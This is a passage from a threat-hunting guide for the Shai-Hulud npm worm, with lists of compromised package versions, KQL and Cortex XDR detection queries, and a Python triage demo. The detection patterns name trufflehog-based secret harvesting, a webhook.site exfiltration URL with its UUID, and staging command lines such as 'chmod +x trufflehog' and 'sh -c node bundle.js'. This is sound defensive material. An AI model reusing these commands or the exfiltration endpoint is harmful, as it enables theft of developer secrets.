    "@nativescript-community/perms@3.0.5",
    "@nativescript-community/perms@3.0.6",
    "@nativescript-community/perms@3.0.7",
    "@nativescript-community/perms@3.0.8",
    "@nativescript-community/sqlite@3.5.2",
    "@nativescript-community/sqlite@3.5.3",
    "@nativescript-community/sqlite@3.5.4",
    "@nativescript-community/sqlite@3.5.5",
    "@nativescript-community/text@1.6.9",
    "@nativescript-community/text@1.6.10",
    "@nativescript-community/text@1.6.11",
    "@nativescript-community/text@1.6.12",
    "@nativescript-community/typeorm@0.2.30",
    "@nativescript-community/typeorm@0.2.31",
    "@nativescript-community/typeorm@0.2.32",
    "@nativescript-community/typeorm@0.2.33",
    "@nativescript-community/ui-collectionview@6.0.6",
    "@nativescript-community/ui-document-picker@1.1.27",
    "@nativescript-community/ui-document-picker@1.1.28",
    "@nativescript-community/ui-drawer@0.1.30",
    "@nativescript-community/ui-image@4.5.6",
    "@nativescript-community/ui-label@1.3.35",
    "@nativescript-community/ui-label@1.3.36",
    "@nativescript-community/ui-label@1.3.37",
    "@nativescript-community/ui-material-bottom-navigation@7.2.72",
    "@nativescript-community/ui-material-bottom-navigation@7.2.73",
    "@nativescript-community/ui-material-bottom-navigation@7.2.74",
    "@nativescript-community/ui-material-bottom-navigation@7.2.75",
    "@nativescript-community/ui-material-bottomsheet@7.2.72",
    "@nativescript-community/ui-material-core@7.2.72",
    "@nativescript-community/ui-material-core@7.2.73",
    "@nativescript-community/ui-material-core@7.2.74",
    "@nativescript-community/ui-material-core@7.2.75",
    "@nativescript-community/ui-material-core-tabs@7.2.72",
    "@nativescript-community/ui-material-core-tabs@7.2.73",
    "@nativescript-community/ui-material-core-tabs@7.2.74",
    "@nativescript-community/ui-material-core-tabs@7.2.75",
    "@nativescript-community/ui-material-ripple@7.2.72",
    "@nativescript-community/ui-material-ripple@7.2.73",
    "@nativescript-community/ui-material-ripple@7.2.74",
    "@nativescript-community/ui-material-ripple@7.2.75",
    "@nativescript-community/ui-material-tabs@7.2.72",
    "@nativescript-community/ui-material-tabs@7.2.73",
    "@nativescript-community/ui-material-tabs@7.2.74",
    "@nativescript-community/ui-material-tabs@7.2.75",
    "@nativescript-community/ui-pager@14.1.36",
    "@nativescript-community/ui-pager@14.1.37",
    "@nativescript-community/ui-pager@14.1.38",
    "@nativescript-community/ui-pulltorefresh@2.5.4",
    "@nativescript-community/ui-pulltorefresh@2.5.5",
    "@nativescript-community/ui-pulltorefresh@2.5.6",
    "@nativescript-community/ui-pulltorefresh@2.5.7",
    "@nexe/config-manager@0.1.1",
    "@nexe/eslint-config@0.1.1",
    "@nexe/logger@0.1.3",
    "@nstudio/angular@20.0.4",
    "@nstudio/angular@20.0.5",
    "@nstudio/angular@20.0.6",
    "@nstudio/focus@20.0.4",
    "@nstudio/focus@20.0.5",
    "@nstudio/focus@20.0.6",
    "@nstudio/nativescript-checkbox@2.0.6",
    "@nstudio/nativescript-checkbox@2.0.7",
    "@nstudio/nativescript-checkbox@2.0.8",
    "@nstudio/nativescript-checkbox@2.0.9",
    "@nstudio/nativescript-loading-indicator@5.0.1",
    "@nstudio/nativescript-loading-indicator@5.0.2",
    "@nstudio/nativescript-loading-indicator@5.0.3",
    "@nstudio/nativescript-loading-indicator@5.0.4",
    "@nstudio/ui-collectionview@5.1.11",
    "@nstudio/ui-collectionview@5.1.12",
    "@nstudio/ui-collectionview@5.1.13",
    "@nstudio/ui-collectionview@5.1.14",
    "@nstudio/web@20.0.4",
    "@nstudio/web-angular@20.0.4",
    "@nstudio/xplat@20.0.5",
    "@nstudio/xplat@20.0.6",
    "@nstudio/xplat@20.0.7",
    "@nstudio/xplat-utils@20.0.5",
    "@nstudio/xplat-utils@20.0.6",
    "@nstudio/xplat-utils@20.0.7",
    "@operato/board@9.0.36",
    "@operato/board@9.0.37",
    "@operato/board@9.0.38",
    "@operato/board@9.0.39",
    "@operato/board@9.0.40",
    "@operato/board@9.0.41",
    "@operato/board@9.0.42",
    "@operato/board@9.0.43",
    "@operato/board@9.0.44",
    "@operato/board@9.0.45",
    "@operato/board@9.0.46",
    "@operato/data-grist@9.0.29",
    "@operato/data-grist@9.0.35",
    "@operato/data-grist@9.0.36",
    "@operato/data-grist@9.0.37",
    "@operato/graphql@9.0.22",
    "@operato/graphql@9.0.35",
    "@operato/graphql@9.0.36",
    "@operato/graphql@9.0.37",
    "@operato/graphql@9.0.38",
    "@operato/graphql@9.0.39",
    "@operato/graphql@9.0.40",
    "@operato/graphql@9.0.41",
    "@operato/graphql@9.0.42",
    "@operato/graphql@9.0.43",
    "@operato/graphql@9.0.44",
    "@operato/graphql@9.0.45",
    "@operato/graphql@9.0.46",
    "@operato/headroom@9.0.2",
    "@operato/headroom@9.0.35",
    "@operato/headroom@9.0.36",
    "@operato/headroom@9.0.37",
    "@operato/help@9.0.35",
    "@operato/help@9.0.36",
    "@operato/help@9.0.37",
    "@operato/help@9.0.38",
    "@operato/help@9.0.39",
    "@operato/help@9.0.40",
    "@operato/help@9.0.41",
    "@operato/help@9.0.42",
    "@operato/help@9.0.43",
    "@operato/help@9.0.44",
    "@operato/help@9.0.45",
    "@operato/help@9.0.46",
    "@operato/i18n@9.0.35",
    "@operato/i18n@9.0.36",
    "@operato/i18n@9.0.37",
    "@operato/input@9.0.27",
    "@operato/input@9.0.35",
    "@operato/input@9.0.36",
    "@operato/input@9.0.37",
    "@operato/input@9.0.38",
    "@operato/input@9.0.39",
    "@operato/input@9.0.40",
    "@operato/input@9.0.41",
    "@operato/input@9.0.42",
    "@operato/input@9.0.43",
    "@operato/input@9.0.44",
    "@operato/input@9.0.45",
    "@operato/input@9.0.46",
    "@operato/layout@9.0.35",
    "@operato/layout@9.0.36",
    "@operato/layout@9.0.37",
    "@operato/popup@9.0.22",
    "@operato/popup@9.0.35",
    "@operato/popup@9.0.36",
    "@operato/popup@9.0.37",
    "@operato/popup@9.0.38",
    "@operato/popup@9.0.39",
    "@operato/popup@9.0.40",
    "@operato/popup@9.0.41",
    "@operato/popup@9.0.42",
    "@operato/popup@9.0.43",
    "@operato/popup@9.0.44",
    "@operato/popup@9.0.45",
    "@operato/popup@9.0.46",
    "@operato/pull-to-refresh@9.0.36",
    "@operato/pull-to-refresh@9.0.37",
    "@operato/pull-to-refresh@9.0.38",
    "@operato/pull-to-refresh@9.0.39",
    "@operato/pull-to-refresh@9.0.40",
    "@operato/pull-to-refresh@9.0.41",
    "@operato/pull-to-refresh@9.0.42",
    "@operato/shell@9.0.22",
    "@operato/shell@9.0.35",
    "@operato/shell@9.0.36",
    "@operato/shell@9.0.37",
    "@operato/shell@9.0.38",
    "@operato/shell@9.0.39",
    "@operato/styles@9.0.2",
    "@operato/styles@9.0.35",
    "@operato/styles@9.0.36",
    "@operato/styles@9.0.37",
    "@operato/utils@9.0.22",
    "@operato/utils@9.0.35",
    "@operato/utils@9.0.36",
    "@operato/utils@9.0.37",
    "@operato/utils@9.0.38",
    "@operato/utils@9.0.39",
    "@operato/utils@9.0.40",
    "@operato/utils@9.0.41",
    "@operato/utils@9.0.42",
    "@operato/utils@9.0.43",
    "@operato/utils@9.0.44",
    "@operato/utils@9.0.45",
    "@operato/utils@9.0.46",
    "@teselagen/bounce-loader@0.3.16",
    "@teselagen/bounce-loader@0.3.17",
    "@teselagen/liquibase-tools@0.4.1",
    "@teselagen/range-utils@0.3.14",
    "@teselagen/range-utils@0.3.15",
    "@teselagen/react-list@0.8.19",
    "@teselagen/react-list@0.8.20",
    "@teselagen/react-table@6.10.19",
    "@thangved/callback-window@1.1.4",
    "@things-factory/attachment-base@9.0.43",
    "@things-factory/attachment-base@9.0.44",
    "@things-factory/attachment-base@9.0.45",
    "@things-factory/attachment-base@9.0.46",
    "@things-factory/attachment-base@9.0.47",
    "@things-factory/attachment-base@9.0.48",
    "@things-factory/attachment-base@9.0.49",
    "@things-factory/attachment-base@9.0.50",
    "@things-factory/auth-base@9.0.43",
    "@things-factory/auth-base@9.0.44",
    "@things-factory/auth-base@9.0.45",
    "@things-factory/email-base@9.0.42",
    "@things-factory/email-base@9.0.43",
    "@things-factory/email-base@9.0.44",
    "@things-factory/email-base@9.0.45",
    "@things-factory/email-base@9.0.46",
    "@things-factory/email-base@9.0.47",
    "@things-factory/email-base@9.0.48",
    "@things-factory/email-base@9.0.49",
    "@things-factory/email-base@9.0.50",
    "@things-factory/email-base@9.0.51",
    "@things-factory/email-base@9.0.52",
    "@things-factory/email-base@9.0.53",
    "@things-factory/email-base@9.0.54",
    "@things-factory/env@9.0.42",
    "@things-factory/env@9.0.43",
    "@things-factory/env@9.0.44",
    "@things-factory/env@9.0.45",
    "@things-factory/integration-base@9.0.43",
    "@things-factory/integration-base@9.0.44",
    "@things-factory/integration-base@9.0.45",
    "@things-factory/integration-marketplace@9.0.43",
    "@things-factory/integration-marketplace@9.0.44",
    "@things-factory/integration-marketplace@9.0.45",
    "@things-factory/shell@9.0.43",
    "@things-factory/shell@9.0.44",
    "@things-factory/shell@9.0.45",
    "@tnf-dev/api@1.0.8",
    "@tnf-dev/core@1.0.8",
    "@tnf-dev/js@1.0.8",
    "@tnf-dev/mui@1.0.8",
    "@tnf-dev/react@1.0.8",
    "@ui-ux-gang/devextreme-angular-rpk@24.1.7",
    "@yoobic/design-system@6.5.17",
    "@yoobic/jpeg-camera-es6@1.0.13",
    "@yoobic/yobi@8.7.53",
    "airchief@0.3.1",
    "airpilot@0.8.8",
    "angulartics2@14.1.1",
    "angulartics2@14.1.2",
    "browser-webdriver-downloader@3.0.8",
    "capacitor-notificationhandler@0.0.2",
    "capacitor-notificationhandler@0.0.3",
    "capacitor-plugin-healthapp@0.0.2",
    "capacitor-plugin-healthapp@0.0.3",
    "capacitor-plugin-ihealth@1.1.8",
    "capacitor-plugin-ihealth@1.1.9",
    "capacitor-plugin-vonage@1.0.2",
    "capacitor-plugin-vonage@1.0.3",
    "capacitorandroidpermissions@0.0.4",
    "capacitorandroidpermissions@0.0.5",
    "config-cordova@0.8.5",
    "cordova-plugin-voxeet2@1.0.24",
    "cordova-voxeet@1.0.32",
    "create-hest-app@0.1.9",
    "db-evo@1.1.4",
    "db-evo@1.1.5",
    "devextreme-angular-rpk@21.2.8",
    "ember-browser-services@5.0.2",
    "ember-browser-services@5.0.3",
    "ember-headless-form@1.1.2",
    "ember-headless-form@1.1.3",
    "ember-headless-form-yup@1.0.1",
    "ember-headless-table@2.1.5",
    "ember-headless-table@2.1.6",
    "ember-url-hash-polyfill@1.0.12",
    "ember-url-hash-polyfill@1.0.13",
    "ember-velcro@2.2.1",
    "ember-velcro@2.2.2",
    "encounter-playground@0.0.2",
    "encounter-playground@0.0.3",
    "encounter-playground@0.0.4",
    "encounter-playground@0.0.5",
    "eslint-config-crowdstrike@11.0.2",
    "eslint-config-crowdstrike@11.0.3",
    "eslint-config-crowdstrike-node@4.0.3",
    "eslint-config-crowdstrike-node@4.0.4",
    "eslint-config-teselagen@6.1.7",
    "globalize-rpk@1.7.4",
    "graphql-sequelize-teselagen@5.3.8",
    "html-to-base64-image@1.0.2",
    "json-rules-engine-simplified@0.2.1",
    "jumpgate@0.0.2",
    "koa2-swagger-ui@5.11.1",
    "koa2-swagger-ui@5.11.2",
    "mcfly-semantic-release@1.3.1",
    "mcp-knowledge-base@0.0.2",
    "mcp-knowledge-graph@1.2.1",
    "mobioffice-cli@1.0.3",
    "monorepo-next@13.0.1",
    "monorepo-next@13.0.2",
    "mstate-angular@0.4.4",
    "mstate-cli@0.4.7",
    "mstate-dev-react@1.1.1",
    "mstate-react@1.6.5",
    "ng2-file-upload@7.0.2",
    "ng2-file-upload@7.0.3",
    "ng2-file-upload@8.0.1",
    "ng2-file-upload@8.0.2",
    "ng2-file-upload@8.0.3",
    "ng2-file-upload@9.0.1",
    "ngx-bootstrap@18.1.4",
    "ngx-bootstrap@19.0.3",
    "ngx-bootstrap@19.0.4",
    "ngx-bootstrap@20.0.3",
    "ngx-bootstrap@20.0.4",
    "ngx-bootstrap@20.0.5",
    "ngx-color@10.0.1",
    "ngx-color@10.0.2",
    "ngx-toastr@19.0.1",
    "ngx-toastr@19.0.2",
    "ngx-trend@8.0.1",
    "ngx-ws@1.1.5",
    "ngx-ws@1.1.6",
    "oradm-to-gql@35.0.14",
    "oradm-to-gql@35.0.15",
    "oradm-to-sqlz@1.1.2",
    "ove-auto-annotate@0.0.9",
    "pm2-gelf-json@1.0.4",
    "pm2-gelf-json@1.0.5",
    "printjs-rpk@1.6.1",
    "react-complaint-image@0.0.32",
    "react-jsonschema-form-conditionals@0.3.18",
    "remark-preset-lint-crowdstrike@4.0.1",
    "remark-preset-lint-crowdstrike@4.0.2",
    "rxnt-authentication@0.0.3",
    "rxnt-authentication@0.0.4",
    "rxnt-authentication@0.0.5",
    "rxnt-authentication@0.0.6",
    "rxnt-healthchecks-nestjs@1.0.2",
    "rxnt-healthchecks-nestjs@1.0.3",
    "rxnt-healthchecks-nestjs@1.0.4",
    "rxnt-healthchecks-nestjs@1.0.5",
    "rxnt-kue@1.0.4",
    "rxnt-kue@1.0.5",
    "rxnt-kue@1.0.6",
    "rxnt-kue@1.0.7",
    "swc-plugin-component-annotate@1.9.1",
    "swc-plugin-component-annotate@1.9.2",
    "tbssnch@1.0.2",
    "teselagen-interval-tree@1.1.2",
    "tg-client-query-builder@2.14.4",
    "tg-client-query-builder@2.14.5",
    "tg-redbird@1.3.1",
    "tg-seq-gen@1.0.9",
    "tg-seq-gen@1.0.10",
    "thangved-react-grid@1.0.3",
    "ts-gaussian@3.0.5",
    "ts-gaussian@3.0.6",
    "ts-imports@1.0.1",
    "ts-imports@1.0.2",
    "tvi-cli@0.1.5",
    "ve-bamreader@0.2.6",
    "ve-editor@1.0.1",
    "verror-extra@6.0.1",
    "voip-callkit@1.0.2",
    "voip-callkit@1.0.3",
    "wdio-web-reporter@0.1.3",
    "yargs-help-output@5.0.3",
    "yoo-styles@6.0.326",
    "ansi-styles@6.2.2", 
    "debug@4.4.2", 
    "chalk@5.6.1", 
    "supports-color@10.2.1",
    "strip-ansi@7.1.1",
    "ansi-regex@6.2.1", 
    "wrap-ansi@9.0.1", 
    "color-convert@3.1.1",
    "color-name@2.0.1", 
    "is-arrayish@0.3.3", 
    "slice-ansi@7.1.1", 
    "color@5.0.1",
    "color-string@2.1.1", 
    "simple-swizzle@0.2.3", 
    "supports-hyperlinks@4.1.1",
    "has-ansi@6.0.1", 
    "chalk-template@1.1.1", 
    "backslash@0.2.1", 
    "error-ex@1.3.3"
)




###HUNT03 - MAL-Domain01-Hunting
#######// Description: This query will check for Domain, DNS, Queryevents, Network Events, URL Infos in Mails and URL Click Events requesting suspicious Domains.
let domainList = dynamic(["webhook.site"]);
union
(
    IdentityQueryEvents
    | where QueryTarget has_any(domainList)
    | project Timestamp, Domain = QueryTarget, SourceTable = "IdentityQueryEvents"
),
(
    DeviceNetworkEvents
    // RemoteUrl carries the hostname/URL; LocalIP and RemoteIP are addresses and can never match a domain name
    | where RemoteUrl has_any(domainList)
    | project Timestamp, DeviceName, InitiatingProcessAccountName, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents", InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessParentFileName
),
(
    DeviceNetworkInfo
    // DnsAddresses holds the configured DNS server addresses and ConnectedNetworks.Name the network name,
    // so this branch only fires if the list contains an IP or a network name, not a queried domain
    | extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks)
    | mv-expand DnsAddresses, ConnectedNetworks
    | where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList)
    | project Timestamp, Domain = tostring(coalesce(DnsAddresses, ConnectedNetworks.Name)), SourceTable = "DeviceNetworkInfo"
),
(
    EmailUrlInfo
    | where UrlDomain has_any(domainList)
    | project Timestamp, Domain = UrlDomain, SourceTable = "EmailUrlInfo"
),
(
    UrlClickEvents
    | where Url has_any(domainList)
    | project Timestamp, Domain = Url, SourceTable = "UrlClickEvents"
)
| order by Timestamp desc







###CIM-HUNT04 - C2 communication
// Find devices that may have communicated with the exfiltration endpoint (Sentinel/Log Analytics tables plus Defender XDR tables)
// Defender tables use Timestamp, Sentinel tables use TimeGenerated: every branch projects TimeGenerated so the final sort works across all of them
// Wildcard subdomains can be added per branch with: or <field> matches regex @"^.*\.example\.com$"
let domainList = dynamic(["webhook.site"]);
union
(
    DnsEvents
    // Name holds the queried FQDN; QueryType is the record type (A, AAAA, ...) and never matches a domain
    | where Name has_any(domainList)
    | project TimeGenerated, Domain = Name, SourceTable = "DnsEvents"
),
(
    IdentityQueryEvents
    | where QueryTarget has_any(domainList)
    | project TimeGenerated = Timestamp, Domain = QueryTarget, SourceTable = "IdentityQueryEvents"
),
(
    DeviceNetworkEvents
    | where RemoteUrl has_any(domainList)
    | project TimeGenerated = Timestamp, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents"
),
(
    DeviceNetworkInfo
    // DnsAddresses are DNS server addresses and ConnectedNetworks.Name is the network name, so this branch only fires for IP or network-name IoCs
    | extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks)
    | mv-expand DnsAddresses, ConnectedNetworks
    | where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList)
    | project TimeGenerated = Timestamp, Domain = tostring(coalesce(DnsAddresses, ConnectedNetworks.Name)), SourceTable = "DeviceNetworkInfo"
),
(
    VMConnection
    | extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames)
    | mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames
    | where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList)
    | project TimeGenerated, Domain = tostring(coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames)), SourceTable = "VMConnection"
),
(
    W3CIISLog
    | where csHost has_any(domainList) or csReferer has_any(domainList)
    | project TimeGenerated, Domain = coalesce(csHost, csReferer), SourceTable = "W3CIISLog"
),
(
    EmailUrlInfo
    | where UrlDomain has_any(domainList)
    | project TimeGenerated = Timestamp, Domain = UrlDomain, SourceTable = "EmailUrlInfo"
),
(
    UrlClickEvents
    | where Url has_any(domainList)
    | project TimeGenerated = Timestamp, Domain = Url, SourceTable = "UrlClickEvents"
)
| order by TimeGenerated desc
 









###CIM-HUNT05 - Files with known malicious hashes (file events)
DeviceFileEvents
| where Timestamp > ago(30d)
| where SHA256 in (
    "46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09",
    "b74caeaa75e077c99f7d44f46daaf9796a3be43ecf24f2a1fd381844669da777",
    "dc67467a39b70d1cd4c1f7f7a459b35058163592f4a9e8fb4dffcbba98ef210c",
    "4b2399646573bb737c4969563303d8ee2e9ddbd1b271f1ca9e35ea78062538db"
)
| project Timestamp, DeviceName, InitiatingProcessAccountName, action_file_name=FileName, FolderPath, SHA256
| order by Timestamp desc





###CIM-HUNT06 - Detect downloads or network requests to the webhook.site IOC
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has "webhook.site" and RemoteUrl has "bb8ca5f6-4175-45d2-b042-fc9ebb8170b7"
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP
| order by Timestamp desc





###CIM-HUNT07 - Detection of the malicious workflow filename (shai-hulud-workflow.yml)
DeviceFileEvents
| where Timestamp > ago(30d)
| where FileName == "shai-hulud-workflow.yml"
| project Timestamp, DeviceName, InitiatingProcessAccountName, FileName, FolderPath, InitiatingProcessCommandLine
| order by Timestamp desc




###CIM-HUNT08 - Hunt for trufflehog use (process telemetry)
DeviceProcessEvents
| where Timestamp > ago(30d)
// case-insensitive on purpose: the dropped binary is usually "trufflehog", but a renamed or re-cased copy should not slip through
| where ProcessCommandLine has "trufflehog" or FileName has "trufflehog"
| project Timestamp, DeviceName, InitiatingProcessAccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by Timestamp desc





###CIM-HUNT09 - Hunt for the staged execution chain (chmod +x trufflehog, node bundle.js launched via sh -c)
DeviceProcessEvents
| where Timestamp > ago(30d)
// chmod +x on the dropped trufflehog binary (with or without the tinycolor/node_modules path), or bundle.js executed by node through sh -c
| where ProcessCommandLine has_all ("chmod", "+x", "trufflehog") or
    ProcessCommandLine has_all ("node", "bundle.js", "sh -c")
| project Timestamp, DeviceName, InitiatingProcessAccountName, FileName, ProcessCommandLine, InitiatingProcessCommandLine
| order by Timestamp desc

```
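The KQL above encodes three kinds of evidence: the staging chain in process command lines (`chmod +x trufflehog`, `node bundle.js` spawned via `sh -c`), the `webhook.site` exfiltration URL with the campaign UUID, and the dropped `shai-hulud-workflow.yml`. The script below is an added example, not code from the original page or from any vendor, that applies the same rules to a handful of constructed endpoint records so the matching logic can be checked offline before it is trusted in a datalake query. The record schema (`type`, `host`, `cmdline`, `url`, `path`) is a simplification assumed for the demo; the indicators themselves are the ones used in the hunts above.

```python
import re
from typing import Dict, List

# Indicators the hunting queries key on (from the hunts above).
WEBHOOK_HOST = "webhook.site"
WEBHOOK_UUID = "bb8ca5f6-4175-45d2-b042-fc9ebb8170b7"
WORKFLOW_FILE = "shai-hulud-workflow.yml"

# Process rules mirror the has_all() clauses: every term must occur in the command line, case-insensitive.
PROCESS_RULES = {
    "trufflehog_staged": ["chmod", "+x", "trufflehog"],
    "trufflehog_run":    ["trufflehog"],
    "bundle_via_sh":     ["sh -c", "node", "bundle.js"],
}

_UUID_RE = re.compile(r"webhook\.site/([0-9a-f-]{36})", re.IGNORECASE)


def match_process(cmdline: str) -> List[str]:
    """Return the names of every process rule whose terms all occur in the command line."""
    low = cmdline.lower()
    return [name for name, terms in PROCESS_RULES.items() if all(t in low for t in terms)]


def match_network(url: str) -> Dict[str, bool]:
    """Classify a remote URL: is it webhook.site at all, and does it carry the UUID seen in this campaign?"""
    m = _UUID_RE.search(url)
    return {
        "webhook_site": WEBHOOK_HOST in url.lower(),
        "known_uuid": bool(m and m.group(1).lower() == WEBHOOK_UUID),
    }


def match_file(path: str) -> bool:
    """Flag the worm's GitHub Actions workflow by file name, whichever directory and path separator is used."""
    return path.replace("\\", "/").rsplit("/", 1)[-1] == WORKFLOW_FILE


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run every record through the rule set and keep only those that fire, with the reason attached."""
    findings: List[Dict[str, object]] = []
    for ev in events:
        kind = ev["type"]
        if kind == "process":
            rules = match_process(ev["cmdline"])
            if rules:
                findings.append({"host": ev["host"], "type": kind, "reason": rules})
        elif kind == "network":
            res = match_network(ev["url"])
            if res["webhook_site"]:  # any webhook.site contact is worth a look; known_uuid raises the priority
                findings.append({"host": ev["host"], "type": kind, "reason": res})
        elif kind == "file":
            if match_file(ev["path"]):
                findings.append({"host": ev["host"], "type": kind, "reason": WORKFLOW_FILE})
    return findings


# Constructed telemetry for the demo (not captured from a real incident); the build-01 rows are benign look-alikes.
SAMPLE_EVENTS = [
    {"type": "process", "host": "dev-mac-01", "cmdline": "/bin/sh -c chmod +x /tmp/trufflehog && /tmp/trufflehog filesystem /Users/dev"},
    {"type": "process", "host": "dev-mac-01", "cmdline": "sh -c node node_modules/@ctrl/tinycolor/bundle.js"},
    {"type": "process", "host": "build-01", "cmdline": "node ./dist/bundle.js --serve"},
    {"type": "network", "host": "dev-mac-01", "url": "https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7"},
    {"type": "network", "host": "qa-linux-02", "url": "https://webhook.site/00000000-1111-2222-3333-444444444444"},
    {"type": "network", "host": "build-01", "url": "https://registry.npmjs.org/chalk"},
    {"type": "file", "host": "dev-mac-01", "path": "/Users/dev/repo/.github/workflows/shai-hulud-workflow.yml"},
    {"type": "file", "host": "build-01", "path": "/srv/ci/.github/workflows/release.yml"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The benign `node ./dist/bundle.js --serve` row is deliberately not flagged: `bundle.js` alone is a common build artifact, and it is the `sh -c` wrapper plus `node` that makes the chain suspicious, which is why CIM-HUNT09 uses `has_all` rather than a bare file-name match. A webhook.site hit with a different UUID is still reported, because the domain itself is not a service a developer workstation normally talks to.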

### 6.4) Hunting Queries Palo Cortex XDR

```cpp
###HUNT01 - Description: Reports indicate only Linux+Mac is targeted due to an os.platform() check, ensure agent coverage on these devices
dataset = endpoints
| filter endpoint_status in (ENUM.CONNECTED, ENUM.DISCONNECTED)
| comp count() by platform



###HUNT02 - Description: Check for connections to any webhook.site domains in raw NGFW URL logs. Optional filter for specific URI observed in use by threat actor.
dataset = panw_ngfw_url_raw
| filter lowercase(url_domain) contains "webhook.site"
// if() needs the value for the true and false branch, otherwise the alter stage is rejected
| alter susp_uri = if(uri contains "bb8ca5f6-4175-45d2-b042-fc9ebb8170b7", true, false)
// Optional filter:
// | filter susp_uri = true
| fields url_domain, uri, susp_uri, *



###HUNT03 - Description: Check for connections to any webhook.site domains in XDR telemetry. Optional filter for specific URI observed in use by threat actor.
dataset = xdr_data
| filter event_type = STORY
| filter lowercase(dst_action_external_hostname) contains "webhook.site" or lowercase(dns_query_name) contains "webhook.site"
//| alter susp_uri = if(uri contains "bb8ca5f6-4175-45d2-b042-fc9ebb8170b7")
//| fields agent_hostname, dst_action_external_hostname, dns_query_name, action_external_hostname, action_network_dns_domains




###HUNT04 - Description: Detect malicious YAML file
dataset = xdr_data
| filter event_type = FILE and action_file_name = "shai-hulud-workflow.yml" and agent_os_type in (ENUM.AGENT_OS_MAC, ENUM.AGENT_OS_LINUX)
| fields agent_hostname, actor_effective_username, action_file_name, action_file_path, actor_process_image_name, actor_process_command_line




###HUNT05 - Detects Trufflehog usage. Legitimate tool abused by threat actor for secrets discovery. False positives may occur if there is legitimate use.
dataset = xdr_data
| filter event_type = PROCESS and lowercase(action_process_image_command_line) contains "trufflehog"
| fields agent_hostname, actor_effective_username, actor_process_command_line, action_process_image_command_line




###HUNT06 - Description: Detect malicious bundle.js file
config case_sensitive = false
| dataset = xdr_data
| filter event_type = FILE and action_file_sha256 = "46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09"
| fields agent_hostname, action_file_name, action_file_path, event_type, event_sub_type, actor_process_image_name, actor_process_command_line

// Fallback on the file name alone: bundle.js is a common build artifact, so expect noise and pivot on the path and the writing process
dataset = xdr_data
| filter event_type = FILE and action_file_name = "bundle.js" and agent_os_type in (ENUM.AGENT_OS_MAC, ENUM.AGENT_OS_LINUX)
| fields agent_hostname, actor_effective_username, action_file_name, action_file_path, actor_process_image_name, actor_process_command_line
 







###HUNT07 - VER2-Compromised Packages
// Hunt for recently compromised npm packages: https://www.ox.security/blog/npm-packages-compromised/ & https://www.aikido.dev/blog/s1ngularity-nx-attackers-strike-again
// Caveat: file telemetry records on-disk paths such as .../node_modules/@ctrl/tinycolor/package.json, never the "name@version" form used below,
// so an exact "in" match on action_file_path cannot hit. Use this list as the reference set for lockfile / package.json checks, or rewrite
// the filter as lowercase(action_file_path) contains "node_modules/<package>/" and confirm the version from the package.json afterwards.
dataset = xdr_data
//| filter event_type = PROCESS and lowercase(action_process_image_command_line) in
| filter event_type = FILE and lowercase(action_file_path) in
(
    "@ahmedhfarag/ngx-perfect-scrollbar@20.0.20",
    "@ahmedhfarag/ngx-virtual-scroller@4.0.4",
    "@art-ws/common@2.0.28",
    "@art-ws/config-eslint@2.0.4",
    "@art-ws/config-eslint@2.0.5",
    "@art-ws/config-ts@2.0.7",
    "@art-ws/config-ts@2.0.8",
    "@art-ws/db-context@2.0.24",
    "@art-ws/di@2.0.28",
    "@art-ws/di@2.0.32",
    "@art-ws/di-node@2.0.13",
    "@art-ws/eslint@1.0.5",
    "@art-ws/eslint@1.0.6",
    "@art-ws/fastify-http-server@2.0.24",
    "@art-ws/fastify-http-server@2.0.27",
    "@art-ws/http-server@2.0.21",
    "@art-ws/http-server@2.0.25",
    "@art-ws/openapi@0.1.9",
    "@art-ws/openapi@0.1.12",
    "@art-ws/package-base@1.0.5",
    "@art-ws/package-base@1.0.6",
    "@art-ws/prettier@1.0.5",
    "@art-ws/prettier@1.0.6",
    "@art-ws/slf@2.0.15",
    "@art-ws/slf@2.0.22",
    "@art-ws/ssl-info@1.0.9",
    "@art-ws/ssl-info@1.0.10",
    "@art-ws/web-app@1.0.3",
    "@art-ws/web-app@1.0.4",
    "@crowdstrike/commitlint@8.1.1",
    "@crowdstrike/commitlint@8.1.2",
    "@crowdstrike/falcon-shoelace@0.4.1",
    "@crowdstrike/falcon-shoelace@0.4.2",
    "@crowdstrike/foundry-js@0.19.1",
    "@crowdstrike/foundry-js@0.19.2",
    "@crowdstrike/glide-core@0.34.2",
    "@crowdstrike/glide-core@0.34.3",
    "@crowdstrike/logscale-dashboard@1.205.1",
    "@crowdstrike/logscale-dashboard@1.205.2",
    "@crowdstrike/logscale-file-editor@1.205.1",
    "@crowdstrike/logscale-file-editor@1.205.2",
    "@crowdstrike/logscale-parser-edit@1.205.1",
    "@crowdstrike/logscale-parser-edit@1.205.2",
    "@crowdstrike/logscale-search@1.205.1",
    "@crowdstrike/logscale-search@1.205.2",
    "@crowdstrike/tailwind-toucan-base@5.0.1",
    "@crowdstrike/tailwind-toucan-base@5.0.2",
    "@ctrl/deluge@7.2.1",
    "@ctrl/deluge@7.2.2",
    "@ctrl/golang-template@1.4.2",
    "@ctrl/golang-template@1.4.3",
    "@ctrl/magnet-link@4.0.3",
    "@ctrl/magnet-link@4.0.4",
    "@ctrl/ngx-codemirror@7.0.1",
    "@ctrl/ngx-codemirror@7.0.2",
    "@ctrl/ngx-csv@6.0.1",
    "@ctrl/ngx-csv@6.0.2",
    "@ctrl/ngx-emoji-mart@9.2.1",
